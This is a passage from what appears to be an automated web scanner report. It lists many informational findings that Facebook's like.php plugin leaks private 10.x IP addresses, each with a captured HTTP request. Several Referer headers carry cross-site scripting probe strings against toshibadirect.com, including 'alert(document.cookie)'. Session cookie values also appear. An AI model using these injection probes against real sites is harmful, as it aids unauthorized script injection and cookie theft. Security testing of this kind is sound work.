The following RFC 1918 IP address was disclosed in the response:

10.33.25.128

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505768&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.52. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.150.119

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D501033&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.53. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.190.101

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.54. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.179.114

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.55. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.185.120

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.56. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.125.29

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.57. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.172.102

Request

Response

21.58. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.235.121

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBlueNile&layout=standard&show_faces=false&action=like&font=arial&colorscheme=light&width=922&height=24 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/engagement-rings?track=head
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.59. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.194.125

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.60. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.182.131

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.61. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.217.104

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1baeb5cbc%26origin%3Dhttp%253A%252F%252Fwww.ftd.com%252Ff38148ebcc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2FFTDFlowers&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.62. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.171.116

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509326&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.63. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.220.128

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.64. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.115.65

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.65. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.31.104

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.66. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.20.106

Request

Response

21.67. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.124.53

Request

Response

21.68. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.224.27

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.69. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.60.32

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.70. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.183.119

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.71. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.32.109

Request

Response

21.72. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.158.102

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(document.cookie)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.73. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.22.23

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fbluefly&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.74. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.179.107

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509552&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.75. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.211.25

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.76. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.123.61

Request

Response

21.77. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.195.126

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D513428&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f'-alert(1)-'82064d64928=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.78. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.197.125

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509549&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO7dc89'-alert(1)-'b678a22fbfb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.79. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.8.112

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509551&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

21.80. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.166.120

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D505767&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.81. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.188.121

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Fpdet.to%3Fpoid%3D509553&layout=button_count&show_faces=false&width=100&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

21.82. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.91.71

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FBlueNile&layout=standard&show_faces=false&action=like&font=arial&colorscheme=light&width=922&height=24 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

